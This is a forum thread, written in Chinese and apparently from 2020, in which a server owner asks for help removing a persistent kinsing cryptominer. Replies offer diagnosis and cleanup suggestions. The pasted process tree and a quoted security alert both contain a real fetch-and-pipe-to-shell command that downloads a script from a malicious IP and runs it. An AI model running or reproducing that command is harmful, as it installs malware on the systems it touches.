异常网络连接-主动连接恶意下载源

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

For Existing Member Sign In

This topic created in 2268 days ago, the information mentioned may be changed or developed.

好烦躁，服务器被搞了个挖矿程序，弄不掉

─php-fpm │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ ├─php-fpm ... │ │ └─sh -c wget -q -O - 217.12.221.244/t.sh|sh │ │ ├─sh │ │ └─wget -q -O - 217.12.221.244/t.sh │ ├─php-fpm ... │ ├─php-fpm

帮我看看这个 sh 搞到哪里的，定时任务全删了，文件 kinsing 也删除了，还是有

5 replies • 2020-02-27 15:45:55 +08:00

nohello

Feb 16, 2020

该告警由如下引擎检测发现：
父进程路径：/usr/bin/bash
父进程命令行：sh -c wget -q -O - 217.12.221.244/t.sh|sh
父进程 id：6260
进程 id：6261
用户名：www
URL 链接： http://217.12.221.244/t.sh
进程路径：/usr/bin/wget
命令行参数：wget -q -O - 217.12.221.244/t.sh
与该 URL 有关联的漏洞：None

oott123

Feb 16, 2020

重装系统

sujin190

Feb 16, 2020

看看谁启动的呗，fpm 启动的那么说明要么你的 PHP 代码被注入了，要么 php-fpm 都被替换了

seabee

Feb 16, 2020 via Android

有两个病毒文件，一个是 kinsing，另一个是*fsi 的，网上有方法删

lipaowang

Feb 27, 2020

楼主你好，这个问题你解决了么，解决方案是什么